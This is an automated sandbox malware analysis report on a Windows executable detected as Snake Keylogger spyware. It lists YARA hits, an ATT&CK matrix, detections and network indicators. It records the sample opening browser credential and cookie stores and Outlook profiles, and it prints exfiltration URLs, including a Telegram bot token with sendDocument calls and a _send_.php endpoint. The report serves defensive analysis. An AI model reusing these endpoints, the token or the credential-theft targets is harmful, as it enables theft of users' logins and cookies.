                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x8M2g1Xxhz.exe PID: 7664, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x8M2g1Xxhz.exe PID: 7664, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3798081243.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x8M2g1Xxhz.exe PID: 7664, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x8M2g1Xxhz.exe PID: 7664, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x8M2g1Xxhz.exe PID: 7664, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                      Command and Scripting Interpreter
                      1
                      DLL Side-Loading
                      1
                      Process Injection
                      1
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      541
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Web Service
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      261
                      Virtualization/Sandbox Evasion
                      LSASS Memory261
                      Virtualization/Sandbox Evasion
                      Remote Desktop Protocol1
                      Archive Collected Data
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                      Process Injection
                      Security Account Manager3
                      Process Discovery
                      SMB/Windows Admin Shares1
                      Data from Local System
                      3
                      Ingress Tool Transfer
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Deobfuscate/Decode Files or Information
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture4
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
                      Obfuscated Files or Information
                      LSA Secrets1
                      System Network Configuration Discovery
                      SSHKeylogging15
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Software Packing
                      Cached Domain Credentials214
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      x8M2g1Xxhz.exe60%VirustotalBrowse
                      x8M2g1Xxhz.exe88%ReversingLabsWin32.Spyware.Snakekeylogger
                      x8M2g1Xxhz.exe100%AviraTR/Crypt.TPM.Gen
                      x8M2g1Xxhz.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      s-part-0017.t-0009.t-msedge.net
                      13.107.246.45
                      truefalse
                        high
                        reallyfreegeoip.org
                        104.21.112.1
                        truefalse
                          high
                          api.telegram.org
                          149.154.167.220
                          truefalse
                            high
                            checkip.dyndns.com
                            193.122.130.0
                            truefalse
                              high
                              checkip.dyndns.org
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://reallyfreegeoip.org/xml/8.46.123.189false
                                  high
                                  http://checkip.dyndns.org/false
                                    high
                                    https://api.telegram.org/bot7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE/sendDocument?chat_id=5830304904&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                      high
                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2012:14:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://www.office.com/x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CFB000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/chrome_newtabx8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/ac/?q=x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.orgx8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icox8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.telegram.org/botx8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmpfalse
                                                    high
                                                    https://www.office.com/lBx8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://chrome.google.com/webstore?hl=enx8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.ecosia.org/newtab/x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://varders.kozow.com:8081x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                  high
                                                                  http://aborters.duckdns.org:8081x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://ac.ecosia.org/autocomplete?q=x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://51.38.247.67:8081/_send_.php?Lx8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://anotherarmy.dns.army:8081x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchx8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://checkip.dyndns.org/qx8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://reallyfreegeoip.org/xml/8.46.123.189$x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004BCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://reallyfreegeoip.orgx8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://api.telegram.org/bot7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE/sendDocument?chat_id=5830x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://api.telegram.orgx8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namex8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedx8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20ax8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://reallyfreegeoip.org/xml/x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs
                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                149.154.167.220
                                                                                                api.telegram.orgUnited Kingdom
                                                                                                62041TELEGRAMRUfalse
                                                                                                104.21.112.1
                                                                                                reallyfreegeoip.orgUnited States
                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                193.122.130.0
                                                                                                checkip.dyndns.comUnited States
                                                                                                31898ORACLE-BMC-31898USfalse
                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                Analysis ID:1588991
                                                                                                Start date and time:2025-01-11 08:07:35 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 9m 26s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:6
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:x8M2g1Xxhz.exe
                                                                                                renamed because original name is a hash value
                                                                                                Original Sample Name:8d5ad043ae91a80f57574f52b78402a7497b7377a29ebd2401c1f42ef0c41617.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.evad.winEXE@1/0@3/3
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 79%
                                                                                                • Number of executed functions: 230
                                                                                                • Number of non-executed functions: 30
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                                                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                TimeTypeDescription
                                                                                                02:08:32API Interceptor10416859x Sleep call for process: x8M2g1Xxhz.exe modified
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                149.154.167.220JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    104.21.112.1fqbVL4XxCr.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.vilakodsiy.sbs/w7eo/
                                                                                                                    BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.kkpmoneysocial.top/86am/
                                                                                                                    9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.buyspeechst.shop/qzi3/
                                                                                                                    QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.buyspeechst.shop/w98i/
                                                                                                                    wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    • 838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
                                                                                                                    SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                    • beammp.com/phpmyadmin/
